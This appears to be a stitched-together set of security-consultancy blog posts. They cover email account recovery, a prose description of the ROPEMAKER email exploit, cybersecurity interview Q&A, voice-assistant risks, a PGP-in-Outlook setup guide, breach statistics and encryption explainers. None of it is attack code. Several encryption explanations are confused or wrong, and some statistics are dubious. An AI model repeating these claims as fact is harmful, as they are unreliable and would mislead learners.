If you’re still connected and can receive mail, try to login on another computer or using your browser’s private mode. When the login fails, try the service’s “Forgot your password” or “Need help” link. The service will email you a new password. Hopefully, you’ll get it before the bad guy.

If that fails, you’ll have to contact the mail service and discuss the problem. Here are the links for Gmail and Microsoft’s Outlook. If you’re using another service, you’ll have to find the right address yourself.

Have you been using the same password for other services? If so, change them as soon as possible.

Once you’ve got everything under control, email apologies to everyone who received, or might have received, spam apparently coming from you.

Finally, follow these steps to make sure this doesn’t happen again:

  • Use strong, long passwords that people can’t guess.
  • Use different passwords for different services, and keep track of them with a password manager.
  • Set up 2-step verification for your service. You should find instructions on the service’s setup or options screen.
  • Never email your password to anyone, and I mean anyone.

You will also need additional email security scans and consulting to ensure the email server is not compromised. Every IT consutlant does their best to secure your servers. You need multiple layers of protection, contact us at IDSS for assistance.


Contact IDSS to help




Most people live under the assumption that email is immutable once delivered, like a physical letter.  A new email exploit, dubbed ROPEMAKER by Mimecast’s research team, turns that assumption on its head, undermining the security and non-repudiation of email; even for those that use SMIME or PGP for signing.  Using the ROPEMAKER exploit a malicious actor can change the displayed content in an email at will. For example, a malicious actor could swap a benign URL with a malicious one in an email already delivered to your inbox, turn simple text into a malicious URL, or edit any text in the body of an email whenever they want. All of this can be done without direct access to the inbox.

Described in more detail in a recently published security advisory, Mimecast has been able to add a defense against this exploit for our customers and also provide security recommendations that can be considered by non-customers to safeguard their email from this email exploit.

So what is ROPEMAKER?

The origin of ROPEMAKER lies at the intersection of email and Web technologies, more specifically Cascading Style Sheets (CSS) used with HTML.  While the use of these Web technologies has made email more visually attractive and dynamic relative to its purely text-based predecessor, this has also introduced an exploitable attack vector for email

Clearly, giving attackers remote control over any aspect of ones’ applications or infrastructure is a bad thing.  As is described in more depth in the ROPEMAKER Security Advisory, this remote-control-ability could enable bad actors to direct unwitting users to malicious Web sites or cause other harmful consequences using a technique that could bypass common security controls and fool even the most security savvy users.  ROPEMAKER could be leveraged in ways that are limited only by the creativity of the threat actors, which experience tells us, is often unlimited.

Changing this:

Into this, post-delivery (without having direct access to the user’s desktop):

To date, Mimecast has not seen ROPEMAKER exploited in the wild.  We have, however, shown it to work on most popular email clients and online email services.  Given that Mimecast currently serves more than 27K organizations and relays billions of emails monthly, if these types of exploits were being widely used it is very likely that Mimecast would see them.  However, this is no guarantee that cybercriminals aren’t currently taking advantage of ROPEMAKER in very targeted attacks.

For details on email clients that we tested that are and are not exploitable by ROPEMAKER and the specifics on a security setting recommended by Apple for Apple Mail, please see the ROPEMAKER Security Advisory.

Is ROPEMAKER a software vulnerability, a form of potential application abuse/exploit, or a fundamental design flaw resulting from the intersection of Web technologies and email?  Does it really matter which it is? For sure attackers don’t care why a system can be exploited, only that it can be. If you agree that the potential of an email being changeable post-delivery under the control of a malicious actor increases the probability of a successful email-borne attack, the issue simplifies itself.  Experience tells us that cybercriminals are always looking for the next email attack technique to use.  As an industry let’s work together to reduce the likelihood that the ROPEMAKER style of exploits gains any traction with cybercriminals!



Cyber Security Interview Q&A

Top 50 Cyber Security Interview Questions and Answers 

The interview process is tough, not only for the candidates but also for the interviewers. The process also depends on the position for which the hiring is done. For a replacement; the skills of the previous employee are taken as the benchmark. In case a team is getting expanded, the management knows the skills that they expect in the candidates. The interview process is tough because:

  • Not many experienced professionals are there who are willing for a job change

  • Interviewer expectations are always high from the candidates

  • The right candidates don’t fall in the budget cap.

Interviewers are usually interested in the candidates who have the necessary domain and technical knowledge unless they are hiring for a particular skill e.g. exploit development.

The Interview Process

  • Resume shortlisting

  • Basic HR questions

  • Interview level 1 (Tech)

  • Interview level 2 (Tech + Attitude)

Once the resume gets shortlisted, this gets followed by the basic HR call. This ensures that the resume is updated, the person is looking for a change and sometimes a basic set of questions about your experience and reason for change. The call will also ensure that whether your resume has been sent for the next level review. The next level can be over a telephonic call, face to face interview or over Skype. Level 1 will actually test your knowledge whereas level 2 will go for your experience and attitude towards work. So be prepared with the basics of information security, technical knowledge and your resume well versed along with a positive attitude.

Different levels - Cyber Security Interview Questions & Answers

  • Level 01 - Basic Questions

  • Level 02 - Learners (Experienced but still learning)

  • Level 03 - Master (Entered into a managerial position or sitting for one)

  • Level 04 - Grandmaster (Senior management roles)

Level 01 - Basic questions (Not to be messed up)

1. Explain risk, vulnerability and threat?
TIP: A good way to start this answer is by explaining vulnerability, and threat and then risk. Back this up with an easy to understand example.

Vulnerability (weakness) is a gap in the protection efforts of a system, a threat is an attacker who exploits that weakness. Risk is the measure of potential loss when that the vulnerability is exploited by the threat e.g. Default username and password for a server – An attacker can easily crack into this server and compromise it.

2. What is the difference between Asymmetric and Symmetric encryption and which one is better?
TIP: Keep the answer simple as this is a vast topic.

Symmetric encryption uses the same key for both encryption and decryption, while Asymmetric encryption uses different keys for encryption and decryption.

Symmetric is usually much faster but the key needs to be transferred over an unencrypted channel.

Asymmetric on the other hand is more secure but slow. Hence, a hybrid approach should be preferred. Setting up a channel using asymmetric encryption and then sending the data using symmetric process.

3. What is an IPS and how does it differs from IDS?

IDS is an intrusion detection system whereas an IPS is an intrusion prevention system. IDS will just detect the intrusion and will leave the rest to the administrator for further action whereas an IPS will detect the intrusion and will take further action to prevent the intrusion. Another difference is the positioning of the devices in the network. Although they work on the same basic concept but the placement is different.

4. What is XSS, how will you mitigate it?

Cross site scripting is a JavaScript vulnerability in the web applications. The easiest way to explain this is a case when a user enters a script in the client side input fields and that input gets processed without getting validated. This leads to untrusted data getting saved and executed on the client side.

Countermeasures of XSS are input validation, implementing a CSP (Content security policy) etc.

TIP: Know the different types of XSS and how the countermeasures work.

5. What is the difference between encryption and hashing?
TIP: Keep the answer short and straight.

Point 1: Encryption is reversible whereas hashing is irreversible. Hashing can be cracked using rainbow tables and collision attacks but is not reversible.

Point 2: Encryption ensures confidentiality whereas hashing ensures Integrity.

6. Are you a coder/developer or know any coding languages?
TIP: You are not expected to be a PRO; understanding of the language will do the job.

Although this is not something an information security guy is expected to know but the knowledge of HTML, JavaScript and Python can be of great advantage. HTML and JavaScript can be used in web application attacks whereas python can be used to automate tasks, exploit development etc. A little knowledge of the three can be of great advantage - both in the interview and on the floor.

7. What is CSRF?

Cross Site Request Forgery is a web application vulnerability in which the server does not check whether the request came from a trusted client or not. The request is just processed directly. It can be further followed by the ways to detect this, examples and countermeasures.

8. What is a Security Misconfiguration?

Security misconfiguration is a vulnerability when a device/application/network is configured in a way which can be exploited by an attacker to take advantage of it. This can be as simple as leaving the default username/password unchanged or too simple for device accounts etc.

9. What is a Black hat, white hat and Grey hat hacker?
TIP: Keep the answer simple.

Black hat hackers are those who hack without authority. White hat hackers are authorised to perform a hacking attempt under signed NDA. Grey hat hackers are white hat hackers which sometimes perform unauthorised activities.

10. What is a firewall?
TIP: Be simple with the answer, as this can get complex and lead to looped questions.

A firewall is a device that allows/blocks traffic as per defined set of rules. These are placed on the boundary of trusted and untrusted networks.

11. How do you keep yourself updated with the information security news?
TIP: Just in case you haven't followed any: the hacker news, ThreatPost, Pentest mag etc.

Be sure to check and follow a few security forums so that you get regular updates on what is happening in the market and about the latest trends and incidents.

12. The world has recently been hit by ……. Attack/virus etc. What have you done to protect your organisation as a security professional?

Different organisations work in different ways, the ways to handle incident is different for all. Some take this seriously and some not. The answer to this should be the process to handle an incident. Align this with one you had and go on… just don’t exaggerate.

13. CIA triangle?

  • Confidentiality: Keeping the information secret.

  • Integrity: Keeping the information unaltered.

  • Availability: Information is available to the authorised parties at all times.

14. HIDS vs NIDS and which one is better and why?

HIDS is host intrusion detection system and NIDS is network intrusion detection system. Both the systems work on the similar lines. It’s just that the placement in different. HIDS is placed on each host whereas NIDS is placed in the network. For an enterprise, NIDS is preferred as HIDS is difficult to manage, plus it consumes processing power of the host as well.


Level 02 - Learners (Experienced but still learning)

15. What is port scanning?

Port scanning is process of sending messages in order to gather information about network, system etc. by analysing the response received.

16. What is the difference between VA and PT?

Vulnerability Assessment is an approach used to find flaws in an application/network whereas Penetration testing is the practice of finding exploitable vulnerabilities like a real attacker will do. VA is like travelling on the surface whereas PT is digging it for gold.

17. What are the objects that should be included in a good penetration testing report?

A VAPT report should have an executive summary explaining the observations on a high level along with the scope, period of testing etc. This can be followed by no of observations, category wise split into high, medium and low. Also include detailed observation along with replication steps, screenshots of proof of concept along with the remediation.

18. What is compliance?

Abiding by a set of standards set by a government/Independent party/organisation. E.g. An industry which stores, processes or transmits Payment related information needs to be complied with PCI DSS (Payment card Industry Data Security Standard). Other compliance examples can be an organisation complying with its own policies.

19. Tell us about your Personal achievements or certifications?

Keep this simple and relevant, getting a security certification can be one personal achievement. Explain how it started and what kept you motivated. How you feel now and what are your next steps.

20. Various response codes from a web application?

1xx - Informational responses
2xx - Success
3xx - Redirection
4xx - Client side error
5xx - Server side error

You may also like - Cybersecurity: What’s next in 2018?

21. When do you use tracert/traceroute?

In case you can’t ping the final destination, tracert will help to identify where the connection stops or gets broken, whether it is firewall, ISP, router etc.

22. DDoS and its mitigation?

DDoS stands for distributed denial of service. When a network/server/application is flooded with large number of requests which it is not designed to handle making the server unavailable to the legitimate requests. The requests can come from different not related sources hence it is a distributed denial of service attack. It can be mitigated by analysing and filtering the traffic in the scrubbing centres. The scrubbing centres are centralized data cleansing station wherein the traffic to a website is analysed and the malicious traffic is removed.

23. What is a WAF and what are its types?
TIP: This topic is usually not asked in detail.

WAF stands for web application firewall. It is used to protect the application by filtering legitimate traffic from malicious traffic. WAF can be either a box type or cloud based.

24. Explain the objects of Basic web architecture?
TIP: Different organisations follow different models and networks. BE GENERIC.

A basic web architecture should contain a front ending server, a web application server, a database server.

Level 03 - Master (Entered into a managerial position or sitting for one)

25. How often should Patch management be performed?

Patch should be managed as soon as it gets released. For windows – patches released every second Tuesday of the month by Microsoft. It should be applied to all machines not later than 1 month. Same is for network devices, patch as soon as it gets released. Follow a proper patch management process.

26. How do you govern various security objects?

Various security objects are governed with the help of KPI (Key Performance Indicators). Let us take the example of windows patch, agreed KPI can be 99%. It means that 99% of the PCs will have the latest or last month’s patch. On similar lines various security objects can be managed.

27. How does a Process Audit go?

The first thing to do is to identify the scope of the audit followed by a document of the process. Study the document carefully and then identify the areas which you consider are weak. The company might have compensatory controls in place. Verify they are enough.

28. What is the difference between policies, processes and guidelines?

As security policy defines the security objectives and the security framework of an organisation. A process is a detailed step by step how to document that specifies the exact action which will be necessary to implement important security mechanism. Guidelines are recommendations which can be customised and used in the creation of procedures.

29. How do you handle AntiVirus alerts?

Check the policy for the AV and then the alert. If the alert is for a legitimate file then it can be whitelisted and if this is malicious file then it can be quarantined/deleted. The hash of the file can be checked for reputation on various websites like virustotal, etc. AV needs to be fine-tuned so that the alerts can be reduced.

30. What is a false positive and false negative in case of IDS?

When the device generated an alert for an intrusion which has actually not happened: this is false positive and if the device has not generated any alert and the intrusion has actually happened, this is the case of a false negative.

You may also like - What are the Top 7 Security certifications?

31. Which one is more acceptable?

False positives are more acceptable. False negatives will lead to intrusions happening without getting noticed.

32. Software testing vs. penetration testing?

Software testing just focuses on the functionality of the software and not the security aspect. A penetration testing will help identify and address the security vulnerabilities.

33. What are your thoughts about Blue team and red team?

Red team is the attacker and blue team the defender. Being on the red team seems fun but being in the blue team is difficult as you need to understand the attacks and methodologies the red team may follow.

34. What is you preferred - Bug bounty or security testing?

Both are fine, just support your answer like Bug Bounty is decentralised, can identify rare bugs, large pool of testers etc.

35. Tell us about your Professional achievements/major projects?

This can be anything like setting up your own team and processes or a security practice you have implemented. Even if the achievement is not from a security domain just express it well.

36. 2 quick points on Web server hardening?
TIP: This is a strong topic, get over with the exact answer and carry on the conversation over the lines.

Web server hardening is filtering of unnecessary services running on various ports and removal of default test scripts from the servers. Although web server hardening is a lot more than this and usually organisations have a customised checklist for hardening the servers. Any server getting created has to be hardened and hardening has to be re-confirmed on a yearly basis. Even the hardening checklist has to be reviewed on a yearly basis for new add-ons.

37. What is data leakage? How will you detect and prevent it?

Data leak is when data gets out of the organisation in an unauthorised way. Data can get leaked through various ways – emails, prints, laptops getting lost, unauthorised upload of data to public portals, removable drives, photographs etc. There are various controls which can be placed to ensure that the data does not get leaked, a few controls can be restricting upload on internet websites, following an internal encryption solution, restricting the mails to internal network, restriction on printing confidential data etc.

Level 04 - Grandmaster (Senior management roles)

38. What are the different levels of data classification and why are they required?

Data needs to be segregated into various categories so that its severity can be defined, without this segregation a piece of information can be critical for one but not so critical for others. There can be various levels of data classification depending on organisation to organisation, in broader terms data can be classified into:

  • Top secret – Its leakage can cause drastic effect to the organisation, e.g. trade secrets etc.

  • Confidential – Internal to the company e.g. policy and processes.

  • Public – Publically available, like newsletters etc.

39. In a situation where a user needs admin rights on his system to do daily tasks, what should be done – should admin access be granted or restricted?

Users are usually not provided with admin access to reduce the risk, but in certain cases the users can be granted admin access. Just ensure that the users understand their responsibility. In case any incident happens, the access should be provided for only limited time post senior management approval and a valid business justification.

40. What are your views on usage of social media in office?
TIP: Keep an open mind with these kinds of questions.

Social media is acceptable, just ensure content filtering is enabled and uploading features are restricted. Read only mode is acceptable till the time it does not interfere with work.

You may also like - How will Blockchain technology revolutionize cybersecurity?

41. What are the various ways by which the employees are made aware about information security policies and procedures?

There can be various ways in which this can be done:

  • Employees should undergo mandatory information security training post joining the organisation. This should also be done on yearly basis, and this can be either a classroom session followed by a quiz or an online training.

  • Sending out notifications on regular basis in the form of slides, one pagers etc. to ensure that the employees are kept aware.

42. In a situation where both Open source software and licensed software are available to get the job done. What should be preferred and why?
TIP: Think from a security perspective and not from the functionality point.

For an enterprise, it is better to go for the licensed version of the software as most of the software have an agreement clause that the software should be used for individual usage and not for commercial purpose. Plus, the licensed version is updated and easy to track in an organisation. It also helps the clients develop a confidence on the organisations’ software and practices.

43. When should a security policy be revised?

There is no fixed time for reviewing the security policy but all this should be done at least once a year. Any changes made should be documented in the revision history of the document and versioning. In case there are any major changes the changes need to be notified to the users as well.

44. What all should be included in a CEO level report from a security standpoint?

A CEO level report should have not more than 2 pages:

  1. A summarised picture of the state of security structure of the organisation.

  2. Quantified risk and ALE (Annual Loss Expectancy) results along with countermeasures.

45. How do you report risks?

Risk can be reported but it needs to be assessed first. Risk assessment can be done in 2 ways: Quantitative analysis and qualitative analysis. This approach will cater to both technical and business guys. The business guy can see probable loss in numbers whereas the technical guys will see the impact and frequency. Depending on the audience, the risk can be assessed and reported.

46. What is an incident and how do you manage it?

Any event which leads to compromise of the security of an organisation is an incident. The incident process goes like this:

  • Identification of the Incident

  • Logging it (Details)

  • Investigation and root cause analysis (RCA)

  • Escalation or keeping the senior management/parties informed

  • Remediation steps

  • Closure report.

47. Is social media secure?
TIP: This is another debatable question but be generic.

Not sure if the data is secure or not but users can take steps from their end to ensure safety.

  • Connect with trusted people

  • Do not post/upload confidential information

  • Never use the same username password for all accounts

48. Chain of custody?

For legal cases the data/device (evidence) needs to be integrated, hence any access needs to be documented – who, what when and why. Compromise in this process can cause legal issues for the parties involved.

49. How should data archives be maintained?

Gone are the times when there used to be files and cabinets which held data over the years. This phase was long followed by archiving data over magnetic tapes and storing the tapes. There is another overhead for the maintenance and safety of the tapes. These are few conventional approaches, but the world is slightly moving to the cloud storage architecture. The only hurdle is the data privacy. Companies are not very sure about handing the critical data. This will actually take time but securely configured and managed cloud can be one of the best options.

50. What are your thoughts on BYOD?

There is no correct answer for this but just ensure that whatever side you are on, justify it with examples, scenarios and logic.

Cyber Security Interview Questions - Topic wise split

Although there is no defined scope and end to the questions, but having a strong foundation of the basic concepts and awareness about the latest trends will give you an upper hand in the interview.


  • BACKUP your answers with examples wherever possible.

  • Provide DETAILS, this will leave less chance for the interviewer to dig into details.

  • BE PRECISE in what you say, LISTEN carefully, THINK and ANSWER.

  • BE CONFIDENT with what you speak.

  • MAINTAIN a good posture.

  • BE AWARE about the security news, recent incidents, attacks etc.

  • Remember the question and answer accordingly, DO NOT get deviated from the topic.

  • Most importantly “KEEP A POSITIVE ATTITUDE” even if the interview is not going as you expected.

  • Sometimes it is kept that way to check the attitude.

Not to miss, to be in a top shape for your cybersecurity interview being a certified ethical hacker is an essential hiring criterion.



Oh Alexa, you are the weakest link

Alexa Mishap Hints at Potential Enterprise Security Risk

When Alexa mailed a copy of a couple's conversation to a contact, it raised warning flags for security professionals in organizations.

News this week that an Amazon Echo device had recorded a family's conversation and emailed it to a seemingly random person on their contact list sent a chill among consumers who are adopting these types of Internet of Things devices.

Amazon was able to explain the sequence of events that led to the unfortunate security breach, but many consumers remain skittish about the new voice assistant sitting in their living rooms. Consumers aren't the only ones with a reason to ask questions, however. A growing number of enterprise applications, including SAP and, have been the target of Echo integration through "skills" - or tasks - that tie Alexa's voice recognition to the application.

According to analysts at, in January 2018 there were more than 25,700 skills published in the US. While the vast majority of these are skills for consumer-oriented integration like smart house control, a quick look in the Amazon Alexa Skills Market shows more than 1,000 business skills listed.

"There is a big push by Amazon and other large vendors to incorporate voice assistants into business applications. Voice assistants are a way for vendors to introduce their layer of AI to existing apps and business process," says Chris Morales, head of security analytics at Vectra.

According to Ovum Research, virtual digital assistants will outnumber humans on earth by 2021. Many of them will inevitably join humans in the workplace. As voice assistant use in business is growing, IT security professionals are beginning to pay attention to the devices and their impact on enterprise IT. 

According to Amazon, the Alexa residential data leak came through an almost comical combination of over-sensitive listening device and ignored voice prompts. The consumers spoke strings of sounds that the Echo interpreted as a call to wake up and then various commands, while the humans in the room never heard the Echo's request for confirmation and instruction. Nevertheless, many breaches are built on a foundation of unlikely, yet possible, sequences so the security industry is taking note of the case.

In April, Amazon closed a vulnerability that allowed an Echo to surreptitiously send a transcript of overheard speech to a developer. And in 2017, Google issued a patch for a hardware problem that left a small number of Home Minis constantly recording the speech around them. All of this is interesting, but why should enterprise IT security pros care?

Alexa Goes to Work

A growing number of skills and integrations are being introduced for voice assistants in the office. From Echo integration with Atlassian Build Meister that will allow developers to check on build status with their voice to skills for Slackthat let you collaborate with co-workers without ever touching a keyboard, voice assistants are becoming part of many developer and operations offices.

In addition, skills for applications like SAP Concur,, and Oracle, seem likely to increase voice assistant use beyond the technical teams to employees in various business units with widely differing technology knowledge and skill sets.

With these integrations, one of the concerns some security professionals have is the lack of a direct tie between device and user. "With voice assistants the action or information that is collected needs to audited and tracked to a single user which is must have for enterprise adoption. So effectively we need a strong voice match to a user so that we can associate an action to a user," says Rishi Bhargava, co-founder of Demisto.

That association has more implications for enterprise applications than for most collaboration systems. "The most obvious problem I already see if the lack of voice recognition to a specific user, in particular with Alexa. How do you manage authentication in a conversational interface?" asks Morales.

Vocal Dangers

So what, really, are the dangers of voice assistants in the enterprise? We've seen the possibility of a voice assistant mis-interpreting voice commands (or random words interpreted as voice commands) to record and send information out of the organization. That possibility has already been exploited in demonstrations of exploits that could be used against a company.

Chinese researchers demonstrated that inaudible commands can trigger Siri to act in an exploit they call "Dolphin Attack." This is a specific instance of exploiting a simple fact about the microphones in voice assistants: They can hear a much wider range of frequencies than can humans.

A significant concern comes with the possibility of a headlong rush into voice assistants in the workplace. "Most companies should be cautiously evaluating the use and potential before implementing any voice system into major systems. There needs to be a period of testing and security validation or a business runs the risk of creating a new attack surface they are not prepared to deal with," says Morales.

Bhargava agrees with the idea of cautiously proceeding, but is less optimistic that it will happen. "Security is always an afterthought. This is no different for the voice assistants. In most cases, the adoption will be organic and at some point, the security teams will evaluate and put controls."

One of the greatest conveniences of voice assistants is that they're always there, listening, and ready to respond. So it seems like a paradox to say that one of the greatest security practices is to turn off the microphone. In effect, that means if the individual using the device is leaving for the day, or for an extended period of time, they should turn off the microphone or turn off the device.

So employees should also be made aware, through signage or training, that a listening device is in the office with them. Just as employees have had to be trained to not respond to phishing emails and to follow privacy regulations in communications, the advent of the voice assistant means that IT security has a new area of training to develop and manage for the organization.

Now, if only Alexa could be trained to deliver the classes for them.



How to Encrypt Emails Using PGP (GPG) in Outlook

How to Encrypt Emails Using PGP (GPG) in Outlook 2016

Edward Snowden is a polarizing public figure, but regardless of how you feel about the man or what he did, the knowledge that the federal government had basically declared open season on all communications between citizens, and had begun gathering and storing all personal emails, phone call records, text messages, etc. was a sudden revelation. Furthermore, it was revealed that the U.S. government either had--or was asking for--a backdoor into every major Internet and technology provider, including Google, Microsoft, Yahoo, and Apple. The most recent public fight between Apple and the FBI over the government wanting a backdoor into breaking into an iPhone has sparked an intense debate over security versus the nanny state, and prompted the Facebook-owned WhatsApp to deploy end-to-end encryption of all messages on their service.

Paranoia aside, it's important to know that privacy violations can occur, as well as the theft of intellectual property and research. With that in mind, it is just as important to know how to implement and use encrypted email. Unfortunately, such a task often seems most outside the wheelhouse of Windows users (Linux people can always drop into a command line and use the powerful tools provided there).

Getting Around the Software

The first thing you need to do is install Gpg4win. This is a Windows implementation of several GPG tools. GPG itself is a Gnu licensed version of the Open PGP standard, which is an open version of PGP--a data encryption and decryption program that is the gold standard for email.

With the alphabet soup out of the way (and Gpg4win installed), create your public and private keys using the Kleopatra app that was installed:

File => New Certificate

Choose the option to create a personal Open PGP pair key. Type in your name and your email, then continue. It will reflect your information back to you, then you can create your key.

The key creation will ask for a passphrase, so be sure to use an actual passphrase you can remember, but not a password that you use for every Internet account you create. You will also be prompted for an expiration if you should choose to add one.

Once that is created, you will have the option to export your keys locally. For the sake of getting around the program a little more, just finish the key creation and ignore this for now.

Kleopatra will show you your certificate in the open window. If you right click on it, you'll see several options, including "export certificates," "export secret keys," and "export certificates to server." Choosing the first option will allow you to download your public key, which is what you will need others to have in order to decrypt your emails. The second option will allow you to download your private key, which you should do, and store in a safe place--perhaps on a USB drive in a safe. Be sure to check the box for ASCII armor. The last option will upload your public key to an Open PGP compliant server. This will make it easier for people to send encrypted emails to you, as they should be able to pull your public key from the server instead of you sending it to them.

Microsoft Outlook

Gpg4win comes with a GpgOL Outlook plugin, but unfortunately, as of this writing, it does not seem to work with Outlook 2016. Instead, get the latest Outlook Privacy Plugin, and use that. Installation is straightforward, and when done, you'll have an "Add-ins" ribbon on your Outlook, and an Open PGP section on your email messages.

Receiving Email

Receiving email is easy. If someone sends you an encrypted email (and correctly uses your public key), when that message comes in, and you double-click on it, you'll be prompted for the passphrase you used when you created your key. Once authenticated, it will decrypt the message.

Sending Email

In order to send email, you will need the recipient's public key. You can get this two ways: from the person his or herself, or from a server. In the case of the latter, click "Lookup server certificates" in Kleopatra, enter the person's email address, and search for it. If it finds the person's certificate, you can click on it and hit "import." With the former, you'll need the person to send you their public key (or some people post it online). Save this data to disk, and then click "Import certificates," choosing the one you just saved.

With the certificate installed, you can create a new email message, then before sending, click on the "Encrypt" toggle on the Open PGP section. When you go to send the message, it'll encrypt it first. If you do not have the person's certificate installed, it'll prompt you with a window from which to select recipients whose keys you do have.

Fingerprint verification

Sometimes you need to verify that the key you have installed is the actual key from the person you wish to send a message. A lot of people us the key fingerprint for this. In Kleopatra, if you right click on a certificate and choose "Certificate Details," you'll see an entry for Key-ID and Fingerprint. Some people use either one as a short identifier for themselves whether in email signatures or Twitter descriptions. You simply match the supplied one up with the one that Kleopatra is showing you, and if it matches, you have the correct pairing. This isn't to say that you can be sure the other person is authentically the other person though, but it is an added layer of protection.

A good resource in email self-defense can be found at the Free Software Foundation's web site. It'll go through GPG installation and encrypted email sending for Linux, Windows, and Mac. For Windows, it walks you through using the Thunderbird mail client with the Enigmail plugin, which is another reason why this blog post deals with Outlook.



11 Cyber Security Fact and Stats

11 Alarming Cyber Security Facts and Stats

  1. There is a hackers attack every 39 seconds, affecting one in three Americans each year.

  2. 95 percent of breached records came from three industries in 2016: Government, retail, and technology.

  3. 43 percent of cyber attacks target small business. 64% of companies have experienced web-based attacks. 62% experienced phishing & social engineering attacks. 59% of companies experienced malicious code and botnets and 51% experienced denial of service attacks.

  4. The average cost of a data breach in 2020 will exceed $150 million by 2020, as more business infrastructure gets connected.

  5. Since 2013 there are 3,809,448 records stolen from breaches every day , 158,727 per hour, 2,645 per minute and 44 every second of every day.

  6. Over 75% of health care industry has been infected with malware over last year.

  7. Large-scale DDoS attacks up 140 percent in 2016’s fourth quarter.

  8. Cybersecurity Ventures reportedly estimates that the global cybersecurity space will grow at a CAGR of 9.8% from around $106.3 billion in 2015 to around $170.2 billion by 2020. Approximately $1 trillion is expected to be spent globally on cybersecurity from 2017 to 2021.

  9. More than 209,000 cybersecurity jobs in the U.S. are unfilled, and postings are up 74% over the past five year. Unfilled cybersecurity jobs will reach 1.5 million by 2019.

  10. The risk is real with IoT and its growing. According to figures compiled within a recent Symantec Internet Security Threat Report, there are 25 connected devices per 100 inhabitants in the US. 50 to 200 billion connected devices by 2020.

  11. Only 38 percent of global organizations claim they are prepared to handle a sophisticated cyberattack.

If any of these items listed impact you, contact idss for resolution.

Comparing Common Encryption


An algorithm is basically a procedure or a formula for solving a data snooping problem. An encryption algorithm is a set of mathematical procedure for performing encryption on data. Through the use of such an algorithm, information is made in the cipher text and requires the use of a key to transforming the data into its original form. This brings us to the concept of cryptography that has long been used in information security in communication systems.


Cryptography is a method of using advanced mathematical principles in storing and transmitting data in a particular form so that only those whom it is intended can read and process it. Encryption is a key concept in cryptography – It is a process whereby a message is encoded in a format that cannot be read or understood by an eavesdropper. The technique is old and was first used by Caesar to encrypt his messages using Caesar cipher. A plain text from a user can be encrypted to a ciphertext, then send through a communication channel and no eavesdropper can interfere with the plain text. When it reaches the receiver end, the ciphertext is decrypted to the original plain text.

Cryptography Terms

  • Encryption: It is the process of locking up information using cryptography. Information that has been locked this way is encrypted.
  • Decryption: The process of unlocking the encrypted information using cryptographic techniques.
  • Key: A secret like a password used to encrypt and decrypt information. There are a few different types of keys used in cryptography.
  • Steganography: It is actually the science of hiding information from people who would snoop on you. The difference between steganography and encryption is that the would-be snoopers may not be able to tell there’s any hidden information in the first place.

Symmetrical Encryption

Symmetric Encryption

This is the simplest kind of encryption that involves only one secret key to cipher and decipher information. Symmetrical encryption is an old and best-known technique. It uses a secret key that can either be a number, a word or a string of random letters. It is a blended with the plain text of a message to change the content in a particular way. The sender and the recipient should know the secret key that is used to encrypt and decrypt all the messages. Blowfish, AES, RC4, DES, RC5, and RC6 are examples of symmetric encryption. The most widely used symmetric algorithm is AES-128, AES-192, and AES-256.

The main disadvantage of the symmetric key encryption is that all parties involved have to exchange the key used to encrypt the data before they can decrypt it.

Asymmetrical Encryption

Asymmetric Encryption

Asymmetrical encryption is also known as public key cryptography, which is a relatively new method, compared to symmetric encryption. Asymmetric encryption uses two keys to encrypt a plain text. Secret keys are exchanged over the Internet or a large network. It ensures that malicious persons do not misuse the keys. It is important to note that anyone with a secret key can decrypt the message and this is why asymmetrical encryption uses two related keys to boosting security. A public key is made freely available to anyone who might want to send you a message. The second private key is kept a secret so that you can only know.

A message that is encrypted using a public key can only be decrypted using a private key, while also, a message encrypted using a private key can be decrypted using a public key. Security of the public key is not required because it is publicly available and can be passed over the internet. Asymmetric key has a far better power in ensuring the security of information transmitted during communication.

Asymmetric encryption is mostly used in day-to-day communication channels, especially over the Internet. Popular asymmetric key encryption algorithm includes EIGamal, RSA, DSA, Elliptic curve techniques, PKCS.

Asymmetric Encryption in Digital Certificates

To use asymmetric encryption, there must be a way of discovering public keys. One typical technique is using digital certificates in a client-server model of communication. A certificate is a package of information that identifies a user and a server. It contains information such as an organization’s name, the organization that issued the certificate, the users’ email address and country, and users public key.

When a server and a client require a secure encrypted communication, they send a query over the network to the other party, which sends back a copy of the certificate. The other party’s public key can be extracted from the certificate. A certificate can also be used to uniquely identify the holder.

SSL/TLS uses both asymmetric and symmetric encryption, quickly look at digitally signed certificates issued by trusted certificate authorities (CAs).






Difference Between Symmetric and Asymmetric Encryption

  • Symmetric encryption uses a single key that needs to be shared among the people who need to receive the message while asymmetrical encryption uses a pair of public key and a private key to encrypt and decrypt messages when communicating.
  • Symmetric encryption is an old technique while asymmetric encryption is relatively new.
  • Asymmetric encryption was introduced to complement the inherent problem of the need to share the key in symmetrical encryption model, eliminating the need to share the key by using a pair of public-private keys.
  • Asymmetric encryption takes relatively more time than the symmetric encryption.


When it comes to encryption, the latest schemes may necessarily the best fit. You should always use the encryption algorithm that is right for the task at hand. In fact, as cryptography takes a new shift, new algorithms are being developed in a bid to catch up with the eavesdroppers and secure information to enhance confidentiality. Hackers are bound to make it tough for experts in the coming years, thus expect more from the cryptographic community!

Credit: and

Do you know your friend, encryption ?


Encryption is one of the many layers of security suggested by our team. To understand encryption, you need to know the main types of encryption used in todays technology. AES and RSA are the two major players in the Encryption world. Even with free certifications, the algorithms are still based on the algorithms. Lets start by discussing the fundamentals of the AES and RSA standards.


AES-256 Encryption

Advanced Encryption Standard (AES) is one of the most frequently used and most secure encryption algorithms available today. It is publicly accessible, and it is the cipher which the NSA uses for securing documents with the classification "top secret". Its story of success started in 1997, when NIST (National Institute of Standards and Technology) started officially looking for a successor to the aging encryption standard DES. An algorithm named "Rijndael", developed by the Belgian cryptographists Daemen and Rijmen, excelled in security as well as in performance and flexibility.

It came out on top of several competitors and was officially announced the new encryption standard AES in 2001. The algorithm is based on several substitutions, permutations and linear transformations, each executed on data blocks of 16 byte – therefore the term blockcipher. Those operations are repeated several times, called “rounds”. During each round, a unique roundkey is calculated out of the encryption key, and incorporated in the calculations. Based on the block structure of AES, the change of a single bit, either in the key, or in the plaintext block, results in a completely different ciphertext block – a clear advantage over traditional stream ciphers. The difference between AES-128, AES-192 and AES-256 finally is the length of the key: 128, 192 or 256 bit – all drastic improvements compared to the 56 bit key of DES. By way of illustration: Cracking a 128 bit AES key with a state-of-the-art supercomputer would take longer than the presumed age of the universe. And Boxcryptor even uses 256 bit keys. As of today, no practicable attack against AES exists. Therefore, AES remains the preferred encryption standard for governments, banks and high security systems around the world.

RSA Encryption

